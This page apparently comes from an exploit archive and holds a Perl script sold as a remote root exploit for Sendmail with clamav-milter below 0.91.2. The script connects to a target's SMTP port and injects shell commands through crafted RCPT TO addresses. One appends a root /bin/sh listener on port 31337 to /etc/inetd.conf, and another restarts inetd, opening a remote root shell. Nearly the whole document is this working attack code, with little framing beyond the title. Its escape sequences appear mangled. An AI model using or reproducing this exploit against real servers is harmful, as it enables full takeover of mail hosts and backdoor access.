Sendmail with clamav-milter < 0.91.2 Remote Root Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
# Published : 2007-12-21
# Author : eliteboy
# Previous Title : MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065)
# Next Title : rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploitn";
print "Copyright (C) 2007 Eliteboyn";

if ($#ARGV != 0) {print "Give me a host to connect.n";exit;}

print "Attacking $ARGV[0]...n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

print $sock "ehlo yourn";
print $sock "mail from: <>rn";
print $sock "rcpt to: <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"@localhost>rn";
print $sock "rcpt to: <nobody+"|/etc/init.d/inetd restart"@localhost>rn";
print $sock "datarn.rnquitrn";

while (<$sock>) {
        print;
}

# www.Syue.com [2007-12-21]